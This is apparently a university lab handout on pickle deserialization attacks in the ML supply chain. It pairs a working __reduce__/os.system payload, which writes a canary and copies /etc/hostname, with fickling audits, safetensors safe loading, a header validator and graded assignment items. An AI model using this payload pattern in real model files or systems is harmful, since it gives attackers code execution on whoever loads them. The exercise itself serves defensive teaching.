Lab 3: ML Supply Chain — Pickle Deserialization and Artifact Validation · AI-201

Module: 3 — ML Supply Chain Attacks (CVE-2025-68664)
Points: 20
Time estimate: 2 hr lab + 1 hr independent
Deliverable: lab-3-report.md + lab3/ directory with artifacts

Objectives

Construct a malicious pickle payload that executes arbitrary code on deserialization.
Use fickling to audit a .pkl file and interpret its output.
Implement a safe-loading control using safetensors and validate it blocks the malicious payload.
Map the attack to ATLAS AML.T0010 (ML Supply Chain Compromise).

Setup

# Pyodide (in-browser) or local Python 3.11+
pip install fickling safetensors torch numpy

For the Pyodide path, open the lab notebook in your browser. The fickling and safetensors packages are available in the course Pyodide environment.

Part A: Construct the Malicious Payload (45 min)

You will build a .pkl file that, when deserialized, writes a canary file to /tmp/pwned.txt. This simulates the behavior of CVE-2025-68664 where model artifacts loaded without validation execute attacker code.

import pickle
import os

class MaliciousPayload:
    """
    Demonstrates the __reduce__ deserialization exploit.
    pickle calls __reduce__ at serialization time (pickle.dump) and records
    the returned callable and its arguments in the byte stream.
    At load time, the unpickler calls that callable with those arguments.
    The attacker controls both the callable and the arguments.
    """
    def __reduce__(self):
        # On load, pickle will call: os.system("...")
        return (os.system, ("echo 'PWNED by pickle' > /tmp/pwned.txt",))

# Serialize (create the output directory first so open() does not fail)
os.makedirs("lab3", exist_ok=True)
payload = MaliciousPayload()
with open("lab3/malicious_model.pkl", "wb") as f:
    pickle.dump(payload, f)

print("Payload written. Size:", os.path.getsize("lab3/malicious_model.pkl"), "bytes")

Step 1: Run this code. Verify the file is created.
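
Before loading the file, it may help to see the mechanism in isolation with a harmless callable. The sketch below uses a hypothetical class, HarmlessDemo, whose __reduce__ returns the built-in len instead of os.system. The names HarmlessDemo, data, and loaded are illustrative and not part of the lab files.

```python
import pickle


class HarmlessDemo:
    """Illustrative stand-in for MaliciousPayload with a benign callable."""

    def __reduce__(self):
        # pickle records "call len('abc')" in the byte stream at dump time.
        return (len, ("abc",))


# __reduce__ runs here, during serialization.
data = pickle.dumps(HarmlessDemo())

# The unpickler calls len("abc") here and returns its result.
# The loaded object is whatever the callable returned, not a HarmlessDemo.
loaded = pickle.loads(data)
print(type(loaded).__name__, loaded)  # int 3
```

Swapping len for os.system is the only change needed to arrive at the Part A payload, which is why calling pickle.load on an untrusted file amounts to running untrusted code.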

Step 2: Load the file with the naive loader pattern (what vulnerable applications do):

# VULNERABLE LOADING PATTERN -- for demonstration only
import os
import pickle

with open("lab3/malicious_model.pkl", "rb") as f:
    obj = pickle.load(f)   # runs the callable that __reduce__ recorded at dump time

# Verify canary was written
canary = "/tmp/pwned.txt"
print("Canary written:", os.path.exists(canary))
if os.path.exists(canary):
    with open(canary) as f:
        print(f.read())

Record: did the canary appear?

Step 3: Extend the payload to model data exfiltration: instead of writing a fixed string, have it read the contents of /etc/hostname and write them to /tmp/exfil.txt. This models the data-exfiltration pattern from CVE-2025-68664.

class ExfilPayload:
    def __reduce__(self):
        cmd = "cat /etc/hostname > /tmp/exfil.txt"
        return (os.system, (cmd,))

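Serialize ExfilPayload to a new file under lab3/, load it with pickle.load, and verify that /tmp/exfil.txt contains your hostname. Record the results.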

Part B: Fickling Audit (30 min)

fickling is a pickle decompiler and static analyzer from Trail of Bits. It inspects a pickle file without executing it.

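# Decompile the malicious file to Python-like source (does not execute it)
fickling lab3/malicious_model.pkl

# Run the safety analysis and print a verdict
fickling --check-safety lab3/malicious_model.pkl

# Between them, the two commands show:
# - The pickle program decoded to human-readable form
# - The callable being invoked on REDUCE
# - A safety verdict

# Also try the Python API. The names below match recent fickling releases;
# check the README of your installed version if an import fails.
python3 -c "
import fickling
from fickling.fickle import Pickled
from fickling.analysis import check_safety

path = 'lab3/malicious_model.pkl'
print('Safe:', fickling.is_likely_safe(path))
with open(path, 'rb') as f:
    result = check_safety(Pickled.load(f))
print('Findings:', result.to_string())
"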

Complete this analysis table in your report:

| Pickle opcode | What it does | Present in malicious_model.pkl? |
|---|---|---|
| REDUCE         | Calls a callable with args | Yes/No |
| GLOBAL / STACK_GLOBAL | Imports a module attribute (STACK_GLOBAL in protocol 4+) | Yes/No |
| INST           | Creates a class instance  | Yes/No |
| NEWOBJ         | Creates via __new__       | Yes/No |
| BUILD          | Calls __setstate__ or updates __dict__ | Yes/No |

Also record: What specific callable does fickling identify in your malicious file? Does it report it as unsafe?

Now create a "benign" pickle: serialize a plain Python dict {"model_version": "1.0", "weights": [0.1, 0.2, 0.3]}. Run fickling on it. Record: does fickling flag it? Which opcodes appear in the malicious pickle but not in the benign one?
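
The standard library's pickletools module offers a second view of the same opcodes, which can be useful for cross-checking the table above. The following is a minimal sketch and not part of fickling: the helper opcode_names, the class CallOnLoad, and the call_ops set are hypothetical, and the payload uses os.getcwd so that nothing harmful happens even if the bytes are loaded. It assumes the default pickle protocol of Python 3.8 or later, where global lookups appear as STACK_GLOBAL rather than GLOBAL.

```python
import os
import pickle
import pickletools


def opcode_names(data: bytes) -> list[str]:
    """Return the opcode names in a pickle byte string without executing it."""
    return [op.name for op, _arg, _pos in pickletools.genops(data)]


class CallOnLoad:
    """Hypothetical payload shape: records a call to a harmless function."""

    def __reduce__(self):
        return (os.getcwd, ())


benign = pickle.dumps({"model_version": "1.0", "weights": [0.1, 0.2, 0.3]})
suspicious = pickle.dumps(CallOnLoad())

benign_ops = set(opcode_names(benign))
suspicious_ops = set(opcode_names(suspicious))

# Opcodes that import or call something; plain data containers need none of them.
call_ops = {
    "GLOBAL", "STACK_GLOBAL", "INST", "OBJ",
    "NEWOBJ", "NEWOBJ_EX", "REDUCE", "BUILD",
}

print("benign    :", sorted(benign_ops & call_ops))
print("suspicious:", sorted(suspicious_ops & call_ops))
```

The presence of these opcodes is a signal rather than a verdict: legitimate pickles of class instances also use them, so what matters is which callable is being imported and invoked.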

Part C: Safe-Loading Defense (45 min)

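The defense against pickle deserialization attacks is format-level: store model weights as safetensors instead of .pkl. A safetensors file holds only a JSON header and raw tensor bytes, so loading it never invokes a callable.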

Step 1: Save a simple tensor with safetensors:

import os

import torch
from safetensors.torch import save_file, load_file

# Create a fake model weights dict
weights = {
    "layer1.weight": torch.randn(10, 5),
    "layer1.bias": torch.zeros(10),
    "layer2.weight": torch.randn(3, 10),
}

save_file(weights, "lab3/safe_model.safetensors")
print("Saved. Size:", os.path.getsize("lab3/safe_model.safetensors"), "bytes")

Step 2: Verify the format cannot carry executable payload:

# safetensors is a pure tensor serialization format: save_file accepts only a
# flat dict of name -> tensor, so there is no place to embed a callable.

# Load the safe file
loaded = load_file("lab3/safe_model.safetensors")
print("Loaded keys:", list(loaded.keys()))
print("Layer1 shape:", loaded["layer1.weight"].shape)

Step 3: Write a validator function that rejects .pkl files and only accepts .safetensors:

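def safe_load_model(filepath: str) -> dict:
    """
    Load model weights from a safetensors file only.
    Rejects .pkl and any other extension before opening the file.
    The check is on the file name; load_file then parses the content
    and raises if it is not valid safetensors.
    """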
    if not filepath.endswith(".safetensors"):
        raise ValueError(
            f"Rejected {filepath}: only .safetensors format is accepted. "
            f"Pickle (.pkl, .pt, .pth) files may execute arbitrary code on load."
        )
    
    from safetensors.torch import load_file
    return load_file(filepath)

# Test the validator
try:
    safe_load_model("lab3/malicious_model.pkl")
    print("ERROR: should have been rejected")
except ValueError as e:
    print("Correctly rejected:", e)

# Verify safe file loads
weights = safe_load_model("lab3/safe_model.safetensors")
print("Safe file loaded:", list(weights.keys()))

Record: does the validator block the malicious file? Does it load the safe file?
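
An extension check alone trusts the file name, which an attacker controls. As a hedged sketch of a content-level check, the function below reads the safetensors layout (an 8-byte little-endian header length followed by a JSON header) using only the standard library. The name looks_like_safetensors, the max_header_bytes limit, and the hand-built demo files are assumptions for illustration; load_file performs its own parsing and raises on malformed input.

```python
import json
import os
import pickle
import struct
import tempfile


def looks_like_safetensors(path: str, max_header_bytes: int = 100_000_000) -> bool:
    """Return True if the file starts with a plausible safetensors header."""
    with open(path, "rb") as f:
        prefix = f.read(8)
        if len(prefix) != 8:
            return False
        (header_len,) = struct.unpack("<Q", prefix)
        # Assumed sanity limit; a pickle's first bytes usually decode to a huge value.
        if header_len == 0 or header_len > max_header_bytes:
            return False
        raw = f.read(header_len)
    if len(raw) != header_len:
        return False
    try:
        header = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError):
        return False
    return isinstance(header, dict)


with tempfile.TemporaryDirectory() as tmp:
    # Hand-built file in the safetensors layout: one float32 tensor of shape [1].
    header = json.dumps(
        {"t": {"dtype": "F32", "shape": [1], "data_offsets": [0, 4]}}
    ).encode("utf-8")
    good_path = os.path.join(tmp, "good.safetensors")
    with open(good_path, "wb") as f:
        f.write(struct.pack("<Q", len(header)) + header + struct.pack("<f", 1.0))

    # A pickle renamed to .safetensors passes an extension check but not this one.
    renamed_path = os.path.join(tmp, "renamed.safetensors")
    with open(renamed_path, "wb") as f:
        pickle.dump({"model_version": "1.0"}, f)

    good_ok = looks_like_safetensors(good_path)
    renamed_ok = looks_like_safetensors(renamed_path)

print("hand-built safetensors accepted:", good_ok)
print("renamed pickle accepted:", renamed_ok)
```

A check like this could run inside safe_load_model before load_file is called. It is a pre-filter that never deserializes anything, not a replacement for the safetensors parser.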

Part D: ATLAS Mapping (20 min)

In your lab report, write a structured ATLAS case study entry for CVE-2025-68664:

## ATLAS Case Study: CVE-2025-68664 (LangGrinch)

**Tactic:** Initial Access
**Technique:** AML.T0010 — ML Supply Chain Compromise
**CVSS:** 9.3 (Critical)

### Attack narrative
[2-3 sentences: what the attacker does, what the target does, what the outcome is]

### Attack preconditions
[List 3 conditions that must hold for this attack to work]

### Detection opportunity
[What would a defender see in logs or filesystem that would indicate this attack occurred?]

### Mitigation
[What control prevents this? At what layer does it operate?]

### Severity context
[Why is the CVSS score 9.3? What is the blast radius?]

Lab Report

Create lab-3-report.md with:

Canary and exfil evidence (screenshots or terminal output paste)
Fickling opcode analysis table (completed)
Safe-loading validator test results
ATLAS case study entry (Part D)
One paragraph: why pickle is not a safe format for untrusted model artifacts, in your own words

Grading

| Component | Points |
|---|---|
| Malicious payload: canary and exfil both demonstrated | 4 |
| Fickling analysis: opcode table completed, benign vs. malicious comparison | 4 |
| Safe-loading validator: blocks .pkl, loads .safetensors, correct error message | 5 |
| ATLAS case study: all five sections filled with specificity | 5 |
| Closing paragraph: accurately explains the format-level issue | 2 |
| Total | 20 |